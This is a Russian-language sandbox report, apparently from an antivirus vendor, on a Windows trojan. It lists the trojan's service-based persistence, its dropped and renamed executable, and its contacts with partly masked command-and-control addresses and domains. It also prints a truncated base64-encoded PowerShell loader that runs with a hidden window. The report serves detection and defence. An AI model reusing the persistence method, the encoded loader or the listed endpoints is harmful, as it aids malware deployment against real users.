Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\EFS] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\where] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\where] 'ImagePath' = '"%WINDIR%\SysWOW64\lsmproxy\where.exe"'
Создает следующие сервисы
- 'where' "%WINDIR%\SysWOW64\lsmproxy\where.exe"
- 'where' %WINDIR%\SysWOW64\lsmproxy\where.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
Удаляет следующие файлы
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
Перемещает следующие файлы
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe в %WINDIR%\syswow64\lsmproxy\where.exe
Подменяет следующие файлы
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
Сетевая активность
Подключается к
- '19#.#02.229.74':80
- '11#.#9.11.81':7080
- '70.##.251.94':8080
TCP
Запросы HTTP GET
- http://at###style.com/wp-admin/pB/
Запросы HTTP POST
- http://70.##.251.94:8080/XscQOeorQbKx/ via 70.##.251.94
UDP
- DNS ASK at###style.com
- DNS ASK ni###angseo.com
- DNS ASK mr##ggy.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...' (со скрытым окном)
